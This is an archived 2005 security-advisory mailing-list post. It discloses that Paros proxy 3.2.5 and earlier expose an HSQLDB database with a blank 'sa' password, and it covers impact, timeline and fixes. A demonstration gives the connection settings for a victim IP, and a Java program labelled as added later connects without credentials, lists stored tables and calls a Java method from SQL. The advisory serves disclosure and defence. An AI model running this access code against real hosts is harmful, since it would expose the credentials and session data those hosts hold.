Message-ID: <OF6EE738A3.06AAB0EA-ONC125709F.004C57D9-C125709F.004E3377@fortconsult.net>
Date: Wed, 19 Oct 2005 16:14:03 +0200
From: Andrew Christensen <anc@...tconsult.net>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: paros proxy v3.2.5 and below blank "sa" password
Title: Paros proxy 3.2.5 and below blank "sa" database password
Summary:

Paros is an intercepting HTTP/HTTPS proxy for use in security testing of
web applications.

Paros version 3.2.5 and below contain a flaw where a remote attacker can
connect to a database port opened on the machine running Paros without
supplying any credentials. The problem stems from the use of a blank
password for the "sa" (system administrator) account of the open-source
database (HSQLDB) integrated with Paros, combined with the database server
accepting connections from the network rather than from localhost only.

The database server (which is written in Java) can invoke public static
Java methods from SQL statements; this is how HSQLDB provides
stored-procedure functionality.
Impact of successful exploitation:

The issue may result in disclosure of confidential data and possible
execution of commands on the victim machine.

A remote attacker may find credentials for web applications, valid session
IDs, and confidential data downloaded from the website being tested with
Paros. This information is present in the database.

Additionally, the possibility of executing Java statements on the database
server may mean that an attacker can gain access to files or execute
commands at the OS level (by performing the Java equivalent of a "system()"
call). This has not been investigated fully, but appears possible.
History:

The overall time-to-correction was EXCEEDINGLY fast:

October 3rd 2005: Problem discovered / reported
October 7th 2005: Issue re-reported via sourceforge, as the mail appeared
lost in transit
October 7th 2005: Paros developer releases updated version where the DB
listens on localhost only
Countermeasures:

Upgrade to version 3.2.6, in which the database listens on localhost only.
After upgrading, confirm that the database port (9001 is the default for
the HSQLDB server) is bound to the loopback address and not reachable from
other hosts.

Firewall the host running Paros so that the database port cannot be
reached from the network.
Demonstration:

To demonstrate this, first start Paros on the victim host (here,
192.168.0.1).

On the attacking host, ensure HSQLDB is installed, and add the following
lines to the file $HOME/sqltool.rc on the attacking host:

# connect to victimhost as sa, victimhost has IP 192.168.0.1
# (no port is given, so the HSQLDB server default of 9001 is used)
urlid victimhost-sa
url jdbc:hsqldb:hsql://192.168.0.1
username sa
password

To connect using the "victimhost-sa" block above, run SqlTool from the
HSQLDB jar (hsqldb.jar, found under lib/ in a standard HSQLDB
distribution):

java -jar $HSQLDB_HOME/lib/hsqldb.jar victimhost-sa

At this point, it is possible to pull data from the tables in the database
(browsing state, history, credentials).

The page at http://hsqldb.org/doc/guide/ch09.html#call-section also states
that it is possible to invoke static Java methods from SQL by writing them
in the format CALL "java.lang.Math.sqrt"(2.0).
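The same connection and checks done through JDBC instead of SqlTool, as an added example that is not part of the original advisory or of the Paros project: it connects to the HSQLDB server with the blank "sa" password, lists the tables the proxy has stored together with their row counts, and invokes java.lang.Math.sqrt from SQL exactly as the HSQLDB guide describes. The class name ParosHsqldbCheck, the default host 192.168.0.1, and the HSQLDB 1.x driver class org.hsqldb.jdbcDriver being on the classpath are assumptions.

```java
import java.sql.Connection;
import java.sql.DatabaseMetaData;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

/*
 * Added example, not from the original advisory or from Paros.
 * Assumes the HSQLDB 1.x driver (hsqldb.jar) is on the classpath:
 *
 *   java -cp hsqldb.jar:. ParosHsqldbCheck 192.168.0.1
 */
public class ParosHsqldbCheck {

    /** Open a connection as "sa" with an empty password. No port is given
     *  in the URL, so the HSQLDB server default (9001) is used. */
    static Connection connect(String host) throws Exception {
        Class.forName("org.hsqldb.jdbcDriver");
        return DriverManager.getConnection("jdbc:hsqldb:hsql://" + host, "sa", "");
    }

    /** Names of all user tables, via standard JDBC metadata, so nothing
     *  here depends on knowing Paros's own table names in advance. */
    static List<String> listTables(Connection c) throws SQLException {
        List<String> names = new ArrayList<String>();
        DatabaseMetaData md = c.getMetaData();
        ResultSet rs = md.getTables(null, null, "%", new String[] {"TABLE"});
        while (rs.next()) {
            names.add(rs.getString("TABLE_NAME"));
        }
        rs.close();
        return names;
    }

    /** Row count of one table; the name is quoted so the case reported by
     *  the metadata call is used as-is. */
    static long rowCount(Connection c, String table) throws SQLException {
        Statement st = c.createStatement();
        ResultSet rs = st.executeQuery("SELECT COUNT(*) FROM \"" + table + "\"");
        rs.next();
        long n = rs.getLong(1);
        rs.close();
        st.close();
        return n;
    }

    /** HSQLDB 1.x lets SQL call a public static Java method by its
     *  fully-qualified name; this is the harmless call from the guide.
     *  The result comes back as a one-row, one-column result set. */
    static double callSqrt(Connection c, double x) throws SQLException {
        Statement st = c.createStatement();
        ResultSet rs = st.executeQuery("CALL \"java.lang.Math.sqrt\"(" + x + ")");
        rs.next();
        double v = rs.getDouble(1);
        rs.close();
        st.close();
        return v;
    }

    public static void main(String[] args) throws Exception {
        String host = args.length > 0 ? args[0] : "192.168.0.1";
        Connection c = connect(host);
        try {
            System.out.println("connected to " + host + " as sa with an empty password");
            for (String t : listTables(c)) {
                System.out.println(t + ": " + rowCount(c, t) + " rows");
            }
            System.out.println("CALL \"java.lang.Math.sqrt\"(2.0) -> " + callSqrt(c, 2.0));
        } finally {
            c.close();
        }
    }
}
```

If the connection succeeds at all, the blank "sa" password is in effect; if it succeeds from a host other than the one running Paros, the database is listening on the network rather than on localhost only, which is the condition version 3.2.6 removes.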
Andrew Christensen
FortConsult ApS
Tranevej 16-18
2400 København NV
tel. (+45) 7020 7525
www.fortconsult.net

FortConsult is the first firm in Scandinavia to be certified by VISA and
MasterCard to carry out security reviews of companies' critical payment
systems.
FortConsult is the only Scandinavian firm certified by VISA to perform
security audits on critical card-payment systems.